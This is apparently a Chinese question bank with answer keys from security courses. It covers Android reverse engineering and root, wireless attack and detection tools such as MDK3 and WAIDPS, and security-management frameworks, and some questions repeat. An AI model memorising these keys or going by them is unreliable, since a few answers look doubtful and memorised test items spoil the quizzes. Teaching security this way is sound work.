17、这句代码(compl-float v0,v2,v2)表达的是什么指令?
A、 比较指令
B、 跳转指令
C、 数据转换指令
D、 数据运算指令
标准答案: A
18、smali.jar编译工具哪个命令可以编译smali为dex文件?
A、 java -jar smali.jar -o HelloWorld.smali classes.dex
B、 java -jar smali.jar -o classes.dex HelloWorld.smali
C、 java -jar -o classes.dex HelloWorld.smali
D、 java -jar -export classes.dex HelloWorld.smali
标准答案: B
19、ApkToolKit工具可以把dex转换成jar包?
A、 对
B、 错
标准答案: A
20、使用哪款反编译工具查看jar文件内容?
A、 Java Decompiler
B、 ApkToolKit
C、 jdk
D、 smali.jar
标准答案: A
21、静态分析是运行程序后进行调试?
A、 对
B、 错
标准答案: B
22、安卓反编译后会出现$符号字节码表示是匿名内部类?
A、 对
B、 错
标准答案: A
23、反编译安卓应用后,一般应该先查看哪一个smali文件的代码?
A、 编译程序打开控制台
B、 打开匿名类smali文件
C、 打开加密解密smali文件
D、 Main最主要smali文件
标准答案: D
24、在整个工作中,无权限程序1发送广播到程序2,有权限的程序2不能让程序1下载文件。()
A、 对
B、 错
标准答案: B
25、哪个选项不是利用Activity劫持对系统进行恶意攻击的?
A、 遍历运行中的程序
B、 恶意程序启动带标志的钓鱼试Activity覆盖正常的Activity
C、 用户在伪造的界面上进行操作
D、 查杀恶意程序发送的信息
标准答案: D
26、程序加载的时候有两种视图,分别是链接视图和执行视图。
A、 对
B、 错
标准答案: A
27、Dex文件结构是一个.class集合,它会把.class里变量、符号和字符串放在池子里面,通过索引来使用,来压缩文件大小。()
A、 对
B、 错
标准答案: B
28、APK保护Anti引用有四个层面,分别为java、native、emulator和资源。()
A、 对
B、 错
标准答案: A
29、不是Anti Emulator检测的是?
A、 属性检测
B、 物理机文件检测
C、 基于cache行为检测
D、 基于代码指令执行检测
标准答案: B
30、DexClassData类分别定义信息里不包括的是?
A、 Method信息
B、 Code信息
C、 Attribute信息
D、 ClassDataHeadr信息
标准答案: C
31、Method ids索引是一个相对于前一个索引的增量,例如:第一个方法是0,第二个方法相对于第一个方法偏移1,就是1。第三个方法相对于第二个方法偏移是1,其实还是1,意思是往下递加。
A、 对
B、 错
标准答案: A
32、Dex加密使用shell的Dex替换原始的Dex,把原始的Dex当成资源或者附加数据进行隐藏。()
A、 对
B、 错
标准答案: A
33、下面不是替换ClassLoader时机的?
A、 ContentProvider:OnCreate()
B、 Application: BaseContext()
C、 Application:OnCreate()
D、 Application:attachBaseContext()
标准答案: B
34、EvilDownload程序发送一个广播到DownloadManager程序接收,拥有权限的DownloadManager程序,可以让EvilDownload程序去下载文件。()
A、 对
B、 错
标准答案: A
35、下面对名称替换的概念性说法有误的是?
A、 把程序里面有意义的类、方法和字段替换无意义随机文本
B、 无意义的随机文有自动还原方法
C、 替换人员识别
D、 用Proguard自动还原
标准答案: B
36、if-ge vA,vB,:cond_** 的意思是?
A、 如果vA大于vB则跳转到:cond_**
B、 如果vA大于等于vB则跳转到:cond_**
C、 如果vA小于vB则跳转到:cond_**
D、 如果vA小于等于vB则跳转到:cond_**
标准答案: B
37、在安卓逆向中经常用到的ADB全称是什么?
A、 Android DataBase
B、 Android Debug Bridge
C、 Asian Development Bank
D、 Apple Desktop Bus
标准答案: B
38、以下哪些功能不是ADB的常用功能?
A、 查看logcat日志
B、 端口转发
C、 shell命令
D、 hook进程
标准答案: D
39、以下命令中哪个是(使用ADB)安装apk的正确命令?
A、 adb install c:\file.apk
B、 adb uninstall c:\file.apk
C、 adb install my.app.client
D、 adb uninstall my.app.client
标准答案: A
40、安卓root的过程中需要对/system/bin/su设置什么权限?
A、 444
B、 755
C、 6755
D、 6444
标准答案: C
41、android中最高权限的用户是?
A、 administrator
B、 root
C、 system
D、 su
标准答案: B
42、android在root的过程中以下哪种说法是错误的?
A、 把su文件放到/system/bin/中
B、 设置/system/bin/su让管理员用户课运行
C、 superuser.apk放到system/app下面
D、 把su文件放到/system/xbin/中
标准答案: B
43、android系统中主要存放核心文件的目录是?
A、 \system\bin
B、 \system\framework
C、 \system\lib
D、 \system\etc
标准答案: B
44、ro.debuggable=1参数的意思系统中所有的程序允许调试?
A、 对
B、 错
标准答案: A
45、Ascii码53,57,49,48对应的数字是?
A、 5912
B、 5801
C、 5910
D、 6910
标准答案: C
46、以下哪个工具可以直接反编译DEX文件为Java源码?
A、 APK改之理
B、 JEB
C、 android逆向助手
D、 android killer
标准答案: B
47、APK改之理工具的“Dalvik Debug Monitor Service“功能一下说法错误的是?
A、 调试apk
B、 反汇编源码
C、 查看日志
D、 查看进行
标准答案: B
48、apktool反编译后其大部分文件后缀为?
A、 .c
B、 .java
C、 .smail
D、 .dalvik
标准答案: C
49、以下哪个不是java语言的内部类?
A、 成员内部类
B、 静态嵌套类
C、 匿名内部类
D、 函数内部类
标准答案: D
50、dalvik虚拟机对应的(文件格式)为.dex压缩格式
A、 对
B、 错
标准答案: A
1、下列关于WAIDPS的描述正确的是?
A、 WAIDPS是一个无线入侵检测工具
B、 WAIDPS是一个无线入侵工具
C、 WAIDPS是一个无线扫描工具
D、 WAIDPS是一个网站入侵检测工具
标准答案: A
2、WAIDPS在认证解除中检测攻击信息会存入下列哪项文件中?
A、 config.ini
B、 pktconfig.ini
C、 attacks
D、 pcap
标准答案: D
3、下列选项中破解wifi不需要握手包的是?
A、 wifi万能钥匙
B、 PIN码穷举
C、 字典破解
D、 WEP秘钥
标准答案: A
4、下列关于802.11a与802.11b描述有误的是 ?
A、 802.11a采用正交频分复用技术
B、 两种协议出现于1999年
C、 802.11a完全不可以适应无线电信号
D、 802.11b采用普遍使用的2.4赫兹频段技术
标准答案: C
5、常见的无线网卡运行模式有几种?
A、 4
B、 5
C、 6
D、 7
标准答案: C
6、下列关于无线pin码破解的描述错误的是____。
A、 WPS技术会随机产生一个8位数字的字符串作为PIN码
B、 PIN码会做对半处理,分前4位和后4位进行匹配
C、 前4位如果匹配错误的话直接drop请求
D、 后4位与前4位一样,前4位如果爆破通过在继续爆破后4位,最后通过认证。
标准答案: D
7、下列关于无线pin码破解的描述错误的是____。
A、 WPS技术会随机产生一个8位数字的字符串作为PIN码
B、 PIN码会做对半处理,分前4位和后4位进行匹配
C、 前4位如果匹配错误的话直接drop请求
D、 后4位与前4位一样,前4位如果爆破通过在继续爆破后4位,最后通过认证。
标准答案: D
8、无线局域网(WLAN)标准IEEE 802.11g规定的最大数据速率是____。
A、 1 Mb/s
B、 11 Mb/s
C、 5 Mb/s
D、 54 Mb/s
标准答案: D
9、在中国,无线载波信道的使用范围是____。
A、 1-11
B、 1-12
C、 1-13
D、 1-14
标准答案: C
10、四种管理帧中包含无线SSID信息的是____。
A、 关联帧
B、 认证帧
C、 探测帧
D、 信标帧
标准答案: D
11、MDK3 是一款无线DOS 攻击测试工具。
A、 正确
B、 不正确
标准答案: A
12、MDK3将可疑数据存入下列哪项文件以备进一步分析?
A、 PCAP
B、 CONFIG.INI
C、 py文件
D、 php文件
标准答案: A
13、MDK3 攻击的是无线AP。
A、 正确
B、 不正确
标准答案: A
14、MDK3可以用来检查隐藏接入点。
A、 正确
B、 不正确
标准答案: A
15、WAIDPS可以检测到MDK3的攻击。
A、 正确
B、 不正确
标准答案: A
16、WAIDPS攻击时会冒用MAC地址以隐藏自己。
A、 正确
B、 不正确
标准答案: A
17、WAIDPS检测到攻击会将攻击数据包详情储存到一个文件夹中以备分析。
A、 正确
B、 不正确
标准答案: A
18、Ascii码53,57,49,48对应的数字是?
A、 5912
B、 5801
C、 5910
D、 6910
标准答案: C
19、以下哪个工具可以直接反编译DEX文件为Java源码?
A、 APK改之理
B、 JEB
C、 android逆向助手
D、 android killer
标准答案: B
20、APK改之理工具的“Dalvik Debug Monitor Service“功能一下说法错误的是?
A、 调试apk
B、 反汇编源码
C、 查看日志
D、 查看进行
标准答案: B
21、apktool反编译后其大部分文件后缀为?
A、 .c
B、 .java
C、 .smail
D、 .dalvik
标准答案: C
22、以下哪个不是java语言的内部类?
A、 成员内部类
B、 静态嵌套类
C、 匿名内部类
D、 函数内部类
标准答案: D
23、dalvik虚拟机对应的(文件格式)为.dex压缩格式
A、 对
B、 错
标准答案: A
24、以下哪个类型不属于dalvik的原始数据类型?
A、 boolean
B、 float
C、 varchar
D、 short
标准答案: C
25、.registers指定了方法中寄存器的总数?
A、 对
B、 错
标准答案: A
26、cconst-wide/16 vx, lit16 的意思是存入int常量道vx,vx+1寄存器,扩展int型常量位long常量
A、 对
B、 错
标准答案: A
27、add-int a,b,c 位计算 a+b 并将结果存入c。
A、 对
B、 错
标准答案: B
28、sub-int/2addr a,b 为计算a-b并将结果存入a。
A、 对
B、 错
标准答案: A
29、以下哪个指令是无符号右移指令?
A、 ushr-int
B、 shr-long
C、 shr-int/2addr
D、 shr-long/2addr
标准答案: A
30、shl-long a,b,c代表左移b、b+1,c指定移动的位置,结果存入a,a+1。
A、 对
B、 错
标准答案: A
31、以下哪个类型转换指令为整型转换为字符串型?
A、 int-to-byte
B、 int-to-char
C、 int-to-short
D、 int-to-long
标准答案: B
32、以下那个是通过短偏移量无条件跳转到目标的指令?
A、 goto/8:goto_0
B、 goto32:goto_0
C、 goto/16:goto_0
D、 goto:goto_0
标准答案: D
33、使用http传输回来文件的下载地址和文件的md5能保证文件不会被替换
A、 对
B、 错
标准答案: B
34、如果被中间人劫持,但是下载安装的apk和手机上装的apk的包名一样,这时候会提示什么
A、 与已安装的程序签名不一致
B、 正常安装无提示
C、 程序已安装
D、 提示程序更新
标准答案: A
35、apk升级漏洞一般发生在什么情况下?( )
A、 APK自升级
B、 应用市场提示升级
C、 应用后台挂起时
D、 设备关机时
标准答案: A
36、APK加固在一定程度上有助于防止签名绕过?
A、 对
B、 错
标准答案: A
37、Android会把什么文件用私钥计算出签名, 然后将签名以及包含公钥信息的数字证书一同写入CERT.RSA 中保存?( )
A、 AndroidManifest.xml
B、 MANIFEST.MF
C、 CERT.RSA
D、 CERT.SF
标准答案: D
38、在保护APK文件不被修改时哪种验证不常见?()
A、 MD5校验
B、 签名校验
C、 文件名校验
D、 加固自校验
标准答案: C
39、动态注册的广播是导出的?( )
A、 对
B、 错
标准答案: A
40、以下选项中不算提权后危害的是?()
A、 数据泄露
B、 消息伪造
C、 钓鱼
D、 修补自身漏洞
标准答案: D
41、NanoHttpd核心的处理函数是什么?( )
A、 isAlive
B、 registerConnection
C、 serve
D、 getListeningPort
标准答案: C
42、哪种可以通过网络与Android应用通信?()
A、 PF_UNIX
B、 PF_INET
C、 PF_NETLINK
D、 pf_packet
标准答案: B
43、模型检测(model checking)是一种很重要的半自动验证技术
A、 对
B、 错
标准答案: B
44、模型检测(model checking)主要通过()或隐式不动点计算来验证有穷状态并发系统的模态/命题性质
A、 后台检测
B、 隐式状态搜索
C、 显式状态搜索
D、 数据匹配
标准答案: C
45、以下选项中不是模型检测(model checking)应用领域的是?
A、 大数据处理
B、 排工问题
C、 漏洞检测
D、 Monty hall Problem and Intel CPU
标准答案: A
46、强制攻击一般发现在什么情况下?
A、 APT攻击
B、 xss攻击
C、 sql注入
D、 暴力破解
标准答案: D
47、以下选择中不是用于应用分析的工具是?
A、 ida
B、 apkide
C、 loadpe
D、 lldb
标准答案: C
48、使用http传输回来文件的下载地址和文件的md5能保证文件不会被替换
A、 对
B、 错
标准答案: B
49、APK加固在一定程度上有助于防止签名绕过?
A、 对
B、 错
标准答案: A
50、动态注册的广播是导出的?( )
A、 对
B、 错
标准答案: A
1、下列关于信息安全CIA标准的描述错误的是____。
A、 保密性是指信息不能泄露给未授权者,确保合适的人看到信息
B、 完整性是指防止未授权更改
C、 可用性是指根据用户要求访问使用特性
D、 保密性可以通过使用散列、配置变更、访问控制、数字签名来实现
标准答案: D
2、"由于缺少灭火器材,而导致火灾的发生使计算机遭到破坏"对于这个安全事件的描述正确的是____。
A、 缺少灭火器材是安全威胁,计算机受到破坏是安全风险
B、 发生火灾是安全威胁,缺少灭火器材是安全脆弱性
C、 计算机遭到破坏是安全威胁,缺少灭火器材是安全脆弱性
D、 发生火灾时安全脆弱性,缺少灭火器材是安全风险
标准答案: B
3、下列对企业安全框架的描述错误的是____。
A、 企业信息安全框架要考虑企业的多样性。不同的企业信息安全的重点和关注点有所不同
B、 帮助解决不同部门之间的协同作业问题
C、 企业信息安全框架有三个要素分别是:安全管理、安全运维、安全技术建设
D、 企业安全框架就是一种全方位的安全防御系统
标准答案: D
4、下列对于TOGAF框架的描述错误的是____。
A、 实现了一个迭代步骤方法
B、 实现了企业连续统一
C、 实现了产品快速高效开发
D、 实现了架构能力管理
标准答案: C
5、下列对于SABSA模型描述错误的是____。
A、 企业信息安全结构开发的模型和方法论
B、 包括战略、概念、实施、度量、审计层次
C、 类似于Zachman,但从安全角度定义需求
D、 是一种迭代模型
标准答案: D
6、下列不属于Cobit模型中业务目标的准则的是____。
A、 有效性
B、 机密性
C、 统一性
D、 完整性
标准答案: C
7、以下选项中哪一项不是ITIL模型的核心?
A、 服务设计
B、 服务操作
C、 服务优化
D、 服务转换
标准答案: C
8、在企业中 ,安全开发人员架构不包括以下哪一项?
A、 监控开发
B、 众测
C、 安全产品开发
D、 开发安全
标准答案: B
9、下列选项中对于企业安全开发人员的职能描述正确的是?
A、 策略标准的制定
B、 业务系统环境安全测试
C、 系统安全加固
D、 根据企业的安全需求开发定制安全产品
标准答案: D
10、下列选项中对风险管理团队的工作描述错误的是?
A、 量化威胁的可能性及对业务的影响
B、 记录和识别风险过程于措施
C、 对员工进行安全意培训
D、 开发衡量标准,及管理各种风险
标准答案: A
11、下列选项中对于信息安全委员会的信息安全管理员的岗位职责描述错误的是?
A、 推广企业信息安全策略,给出安全管理指南
B、 代表本专业、本部门独立客观发表评审意见
C、 决策公司安全规划方向
D、 定期审阅并及时更新信息安全管理策略
标准答案: C
12、下列选项中不是ISO27001安全属性的是?
A、 保密性
B、 完整性
C、 可用性
D、 持续性
标准答案: D
13、SOA适用性声明ISO27001:2013中的介质处理不包括以下哪个选项?
A、 可移动介质的管理
B、 介质的处理
C、 访问控制策略
D、 物理介质传输
标准答案: C
14、下列选项中对于安全策略的描述错误的是?
A、 为达到特定目标而执行的详细步骤
B、 满足公司所有法律法规
C、 根据组织变化迭代发布版本
D、 表达专业和重要性,不含无法理解语言陈述
标准答案: A
15、个人工作经历数据属于信息分类的哪一级别?
A、 公开
B、 隐私
C、 敏感
D、 机密
标准答案: B
16、身份标识的主体不包括以下哪个选项?
A、 令牌
B、 用户
C、 程序
D、 系统
标准答案: A
17、物理安全中入侵破坏的响应对策不包括____。
A、 警察
B、 消防
C、 医务
D、 警示
标准答案: D
18、网络数据使用哪种接口进行传输
A、 RJ11
B、 RJ45
C、 RJ12
D、 RJ48
标准答案: B
19、语音数据传输采用哪种线缆材料传输
A、 4芯
B、 5芯
C、 6芯
D、 5类非屏蔽线
标准答案: A
20、工程布线设计应采用什么方式完成走线
A、 上走线
B、 下走线
C、 弱电间
D、 机柜内
标准答案: A
21、企业布线过程中,机房不需要布设语音点
A、 对
B、 错
标准答案: B
22、UPS的总开关跟其他的开关保持
A、 相连
B、 独立
C、 级联备份
标准答案: B
23、当市电断电后再保持供电的UPS是哪种
A、 在线式
B、 后备式
C、 在线互动式
标准答案: B
24、UPS关机步骤应该是
A、 先将UPS面板关机,使UPS处于旁路工作继续对电池供电,再逐个关掉负载,最后完全断电
B、 逐个关闭负载,再将UPS面板关机,然后再将UPS完全关闭,断开市电
C、 断开市电,再将UPS面板关机,逐个关闭负载,最后再关UPS
标准答案: B
25、在使用UPS的情况下,开关设备的时候,应当所有设备一起打开,这样会保证系统的同步运行
A、 对
B、 错
标准答案: A
26、标准确认书应该包含有什么需求
A、 测试需求
B、 系统需求
C、 软件需求
标准答案: A
27、在工程实施之前,验收方可以不给施工方弱电布线图纸,但施工结束后必须有图纸
A、 对
B、 错
标准答案: B
28、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是
A、 传输层
B、 表示层
C、 会话层
D、 应用层
标准答案: C
29、网络中端口与端口之间连接所用的层是
A、 网络层
B、 表示层
C、 应用层
D、 传输层
标准答案: D
30、IPV4是32位网络地址
A、 对
B、 错
标准答案: A
31、在无线协议里面,能够达到54Mbps/2.4GHz频段的协议类型是
A、 802.11 x
B、 802.11 a
C、 802.11 g
D、 802.11 I
标准答案: C
32、在云技术服务里,支持软件云服务,按权限访问特定应用的技术是
A、 SaaS
B、 IaaS
C、 PaaS
标准答案: A
33、代表非盈利性组织的域名是
A、 COM
B、 ORG
C、 NET
D、 INT
标准答案: B
34、在现代网络中3g网络的频谱能达到1800MHz
A、 对
B、 错
标准答案: B
35、保存着路由器上当前IOS版本的介质是
A、 ROM
B、 RAM
C、 Flash
D、 NVRAM
标准答案: C
36、哪种存储介质掉电后数据不易丢失
A、 ROM
B、 NVRAM
C、 Flash
标准答案: B
37、在CISCO命令行界面中只有一个#的模式表示什么
A、 enable模式
B、 用户模式
C、 配置模式
标准答案: A
38、一般路由器界面中,有两级访问权限,用户级和特权级
A、 对
B、 错
标准答案: A
39、配置默认路由正确的命令是
A、 R1(config-if)#ip route 0.0.0.0 100.0.0.2
B、 R1(config-if)#ip route 0.0.0.0 0.0.0.0 100.0.0.2
C、 R1(config-if)#ip route 100.0.0.2 0.0.0.0
D、 R1(config-if)#ip route 100.0.0.2 0.0.0.0 0.0.0.0
标准答案: B
40、有几个RFC定义了IPsec的核心
A、 一个
B、 两个
C、 三个
D、 四个
标准答案: C
41、当一个路由器接收到发往另一个路由器的内部网络报文时,IPSEC暂不会被启动,只有当传输数据时才会启动
A、 对
B、 错
标准答案: B
42、以下哪种描述是ntdp协议的作用
A、 时间同步
B、 收集网络拓扑信息
C、 网络扫描工具
标准答案: B
43、ACL的作用是什么
A、 控制网络服务质量
B、 访问控制列表
C、 增强内部网关路由协议
D、 地址解析协议
标准答案: B
44、路由器命令中全双工配置命令是
A、 duplex full
B、 duplex auto
C、 duplex half
标准答案: A
45、密码学家对以下属于高频字母的分类是
A、 D,L,U,C,M
B、 P,F,Y,W,G,B,Y
C、 E,T,A,O,N,I,R,S,H
标准答案: C
46、近代密码学的理论主要手段是替代和换位
A、 对
B、 错
标准答案: A
47、密码管理过程中唯一要保护的是
A、 密钥
B、 算法
C、 加密方法
标准答案: A
48、密码学转换技术里的雪崩效应是指
A、 算法用于确保加密过程中不会产生某种模式的随机值。与密钥一同使用,传输时不用加密
B、 与扩散类似,算法输入值轻微的变化会引起输出值的显著变化
C、 明文加密之前对其把明文的最后一个块增加到每一块需要的长度
标准答案: B
49、已知明文攻击的方法是
A、 攻击者选择特定明文发给受害者,待受害者加此明文发送出去后,再截
B、 攻击者拥有一条或多条消息的明文和相对应的密文
C、 通过搜集外部的信息来分析进行攻击
标准答案: B
50、何种加密类型是128位分组,密钥长度可为128,192,256,进行16轮运算
A、 CAST
B、 IDEA
C、 Twofish
标准答案: C
1、针对哈希算法的攻击方式是
A、 暴力攻击
B、 信息载荷
C、 数学分析
标准答案: A
2、消息分组为512位,产生128位的散列值是哪种密码技术
A、 RSA
B、 ECC
C、 MD5
标准答案: C
3、AES算法,要求是分组算法,支持128,192,256密钥长度
A、 对
B、 错
标准答案: A
4、哪种属于业务过程中的无限事件
A、 台风洪水
B、 网络中断
C、 信息损失
D、 交通瘫痪
标准答案: A
5、业务连续性发生中断的时候最大的影响是哪种行业
A、 医疗
B、 能源
C、 媒体
标准答案: B
6、BCP的活动包括哪个
A、 分配责任
B、 物流统计
C、 工程管理
标准答案: A
7、属于业务影响分析的是
A、 BCP
B、 BIA
C、 DRP
D、 ISO
标准答案: B
8、以下哪个是平均故障间隔时间
A、 MTTR
B、 MTBF
C、 MTBD
标准答案: B
9、BCP的策略过程包括建立技能和培训工作,帮助制定各种连续性选项
A、 对
B、 错
标准答案: B
10、包含政策,组织,业务,资源的国际标准是
A、 BCP
B、 BS25999-2
C、 IEC27031
D、 DRI
标准答案: B
11、BS25999是关于什么的标准
A、 英国BSI业务连续性管理
B、 国际协会专业实践
C、 业务连续性有序实践
标准答案: A
12、DRI是用来取代ISO22301国际标准的
A、 对
B、 错
标准答案: B
13、OWASP Mobile Risks里的设备信息未保护是属于哪一项
A、 密码破解
B、 意外的数据泄漏
C、 同过不可信输入进行安全决策
D、 不安全的数据存储
标准答案: D
14、哪种情况属于软件出现开发问题的时候使软件进入冷重启加载
A、 发生一个内核故障,以受控的方式关闭系统
B、 以不受控方式出现之后
C、 一个意外内核或介质故障
标准答案: C
15、在开发安全里,哪种属于软件的脆弱性测试
A、 不得明文方式传送命令数据
B、 内核缺陷
C、 软件的许可问题
标准答案: B
16、在软件开发阶段,安全没有纳入重要考虑因素是安全隐患来源
A、 对
B、 错
标准答案: A
17、数据库模型当中,属于层次数据库的是
A、 组合逻辑树结构中相关联的记录和字段如LDAP
B、 使用属性行和元组列来包含组织信息是广泛的模型
C、 设计为管理多种不同类型的数据
D、 允许每个数据元素用于多个父节点和子记录
标准答案: A
18、哪种是第二代编程语言
A、 机器语言
B、 汇编语言
C、 自然语言
标准答案: B
19、在web开发过程中对于用户要操作重要的操作建议采用
A、 密码要小于6位方便记忆
B、 验证码使用后不要失效
C、 接受短信验证码
标准答案: C
20、确定目标,识别解决风险,开发和测试,计划下次迭代的是哪种开发模型
A、 增量模型
B、 原型模型
C、 螺旋模型
标准答案: C
21、分析和快速设计是增量模型中的一种
A、 对
B、 错
标准答案: B
22、瀑布式模型一般分为几个阶段
A、 4个
B、 3个
C、 2个
D、 1个
标准答案: A
23、传统项目中不包含单元测试
A、 对
B、 错
标准答案: B
24、最好的架构,需求和设计出自于
A、 团队
B、 经理
C、 设计
标准答案: A
25、敏捷不是指下面的哪一种
A、 方法论
B、 价值观
C、 原则
标准答案: A
26、公司治理模型中 COSO 和 Cobit的关系正确的是?
A、 COSO 模型和 CobiT 模型一样重要
B、 CobiT 模型比 COSO 模型重要
C、 COSO 模型比 CobiT 模型重要
D、 COSO 模型是 CobiT 模型的一部分
标准答案: C
27、COSO 是 IT 风险控制模型是否正确?
A、 对
B、 错
标准答案: B
28、在开发过程中,对于已经做过的事情,进行重复性利用,属于CMMI模型中的哪一级?
A、 初始级
B、 已管理级
C、 已定义级
D、 量化管理级
标准答案: B
29、ITIL 模型是一套应用于IT服务管理的实践标准是否正确?
A、 对
B、 错
标准答案: A
30、不属于渗透工程师主要职能的有?
A、 新产品的安全测试
B、 调研要测试目标的信息
C、 修改测试产品出现的错误
D、 出具测试报告及修复方案
标准答案: C
31、CXO 并不需要承担公司法律及业务责任是否正确?
A、 对
B、 错
标准答案: B
32、对企业员工进行安全意识培训属于以下哪一团队职责?
A、 风险管理团队
B、 风险测试团队
C、 风险分析团队
D、 风险评估团队
标准答案: A
33、风险分析团队需要对风险造成的影响和对策的成本之间达到预算平衡的效果,是否正确?
A、 对
B、 错
标准答案: A
34、以下说法错误的是?
A、 信息安全管理员有责任推广企业信息安全策略,给出安全管理指南
B、 信息安全主任委员有权利决策公司安全规划方向
C、 信息安全委员秘书负责组织安拍和召集评审会议、会议记录
D、 信息安全委员秘书可以决策公司安全规划方向
标准答案: D
35、信息安全委员会有权对各部门的资源访问权限做限制,是否正确?
A、 对
B、 错
标准答案: A
36、ISO27001:2005 的内容不包括:
A、 安全方针
B、 访问控制
C、 资产管理
D、 产品发布
标准答案: D
37、ISO27001:2013 标准内容包括14个领域和113个控制措施,是否正确?
A、 对
B、 错
标准答案: A
38、SOA适用性声明ISO27001中提到的物理环境安全不包括以下哪一项?
A、 物理入口控制
B、 密码策略
C、 办公室、房间和设施的安全保护
D、 公共访问、交接区安全
标准答案: B
39、在SOA适用性声明ISO27001中,网络服务的安全属于网络安全管理中的一部分,是否正确?
A、 对
B、 错
标准答案: A
40、以下步骤不属于ISMS模型的有哪一项?
A、 实施所选的控制措施以满足控制目标
B、 对ISMS实施可识别的改进
C、 对项目进行检测、控制
D、 定义ISMS策略、范围
标准答案: C
41、ISMS模型中的 CHECK ,是指定义ISMS策略、范围,是否正确?
A、 对
B、 错
标准答案: B
42、以下属于信息所有者应承担的责任的是?
A、 接受企业风险级别,承担风险首责
B、 策略控制失效首责
C、 监控、分析、变更事项首责
D、 本职工作数据安全责任
标准答案: D
43、员工的工作经历在信息分类中属于隐私信息,是否正确?
A、 对
B、 错
标准答案: A
44、以下属于性能测试的是哪一项?
A、 硬盘性能
B、 虚拟机配置
C、 数据库管理
D、 应用配置
标准答案: A
45、建立策略目录树,可以方便信息安全策略的规划和实施,是否正确?
A、 对
B、 错
标准答案: A
46、以下对SSO验证说法正确的是哪一项?
A、 根据用户已知的内容进行验证,如密码
B、 根据用户拥有的物品进行验证,如钥匙
C、 根据用户身份进行验证,如指纹
D、 通过一个合法授权管理访问多个授权系统
标准答案: D
47、身份验证是一种执行策略,是否正确?
A、 对
B、 错
标准答案: A
48、访问控制模型不包括以下哪一项?
A、 自主访问控制
B、 强制访问控制
C、 角色型访问控制
D、 访客访问控制
标准答案: D
49、Bell-LaPadula 模型中的强星型规则是指,一个主体只能在一个安全级别上执行,是否正确?
A、 对
B、 错
标准答案: A
50、以下不属于技术实践威胁的是?
A、 文档下载
B、 字典攻击
C、 登录欺骗
D、 网络钓鱼
标准答案: A
1、进行密码爆破属于字典攻击,是否正确?
A、 对
B、 错
标准答案: A
2、以下哪项不属于企业安全环境中的物理安全?
A、 配电系统
B、 墙壁和天花板建筑材料
C、 外围组件
D、 钓鱼页面
标准答案: D
3、在企业工作环境物理安全中,墙壁天花板的材料选用、防火等级、承重并不重要,是否正确?
A、 对
B、 错
标准答案: B
4、视频中提到,液体(石油)在火灾级别中属于哪一类?
A、 A类
B、 B类
C、 C类
D、 D类
标准答案: B
5、为了保护计算机和数据要定期对计算机做数据备份,是否正确?
A、 对
B、 错
标准答案: A
6、下面那个选项不是企业信息安全范围三大控制的():
A、 管理控制
B、 物理控制
C、 虚拟控制
D、 技术控制
标准答案: C
7、国际通用CIA准则环境三角那个不是():
A、 保密性
B、 完整性
C、 实践性
D、 可用性
标准答案: C
8、企业信息安全范围三大控制中,管理控制包括风险管理、安全治理、操作安全、法律法规、业务连续行控制和灾难格式计划。()
A、 对
B、 错
标准答案: B
9、下面对安全风险的定义不正确的是():
A、 缺少安全措施的一种缺陷
B、 利用识别脆弱性不会带来安全威胁
C、 显示一个脆弱性的列子
D、 威胁主体利用脆弱性带来的影响
标准答案: B
10、通过资产价值,威胁价值来赋值划分安全等级错误的是():
A、 6,高
B、 4~5,高
C、 1~3,低
D、 4~5,中
标准答案: B
11、信息安全定义属性有风险、暴露、威胁和脆弱性。()
A、 对
B、 错
标准答案: A
12、企业信息框架、信息安全规划所有部门沟通正确的是():
A、 说的一些事情、术语不一样,业务纯利润、保值投资策略,产品,业务无风险
B、 利用信息安全框架模型组织共鸣,来组织有共同的话题、方向和内容
C、 业务一般都理解你技术花在方案上
D、 技术一般都理解业务这个利润的价值和谁在做怎样的事情
标准答案: B
13、根据安全人员架构不是安全职能的是():
A、 安全教育培训
B、 审计部门
C、 执行管理者:CXO
D、 安全管理者:CIO、CISO、CTO
标准答案: A
14、CXO不包括CIO/CISO/CSO/CPO/CTO这些企业安全架构。()
A、 对
B、 错
标准答案: B
15、通用安全模型ISO27001安全属性黄金三角正确的是():
A、 完整性:未授权者能对信息更改
B、 保密性:信息不能泄露给未授权者,确保那些适合的人能访问或看到信息
C、 保密性:信息泄露能给未授权者,也可以访问或看到信息
D、 可用性:用户要求访问使用特性,不用确保授权人在使用信息
标准答案: B
16、通用安全模型ISO27001能给未授权者访问到信息,更改信息和使用信息。()
A、 对
B、 错
标准答案: B
17、企业的安全标准,战术目标说法正确的是():
A、 强制性活动,动作或规划,确保组织机构之间同意方式
B、 违反战术的标准内容
C、 做到和不支持策略的战术工具
D、 所谓的标准不需要满足策略存在的战术工具
标准答案: A
18、下面对措施说法错误的是():
A、 措施不是为项目、计划任务而存在的
B、 为完成步骤,制定的人员,范围,活动
C、 为达到特定目标而执行的详细步骤
D、 措施包括自定完成事情的时间,自定完成任务的时候需要详细阶段与步骤
标准答案: A
19、基准是设定一些标准安全,不能触碰、超越的底线,定义所需要的最低保护级别。()
A、 对
B、 错
标准答案: A
20、指南是为达到特定目标而执行的详细步骤,不便于搭建服务器、中间件和自定文档。()
A、 对
B、 错
标准答案: B
21、主体访问客体步骤正确的是():
A、 身份标识,身份验证,授权,访问资源,问责
B、 用户,授权,程序,系统。
C、 密码短语,密钥,个人身份证(PIN),令牌,访问资源
D、 身份标识,主体凭证,身份验证,授权,问责
标准答案: A
22、访问控制是一种安全手段,主体即一个虚体,客体是被访问信息或被访问实体,访问指主体和客体之间的信息流动。()
A、 对
B、 错
标准答案: B
23、主体和客体之间理解,主动去访问电脑、应用的是主体,被访问的文件、磁盘是客体。()
A、 对
B、 错
标准答案: A
24、企业常见身份标识技术有ID、用户名、AD域控、行为管理设备、账号、LDAP。()
A、 对
B、 错
标准答案: A
25、通过观景、入口、设施社区布局、照明等条件模式来预防犯罪。()
A、 对
B、 错
标准答案: A
26、在车库内、楼梯间和电梯使用玻璃窗能让犯罪者打消作案心里想法。()
A、 对
B、 错
标准答案: A
27、TOGAF框架需求管理迭代步骤方法正确的是():
A、 架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
B、 预备阶段,架构能力管理,架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
C、 信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
D、 构架变更管理,实施治理,迁移规划,机会及解决方案,,技术架构,信息系统架构
标准答案: A
28、Zachman企业框架方向和设计都是采用纵横坐标。()
A、 对
B、 错
标准答案: A
29、Zachman模型不是基于人来开发的一个模型框架。()
A、 对
B、 错
标准答案: B
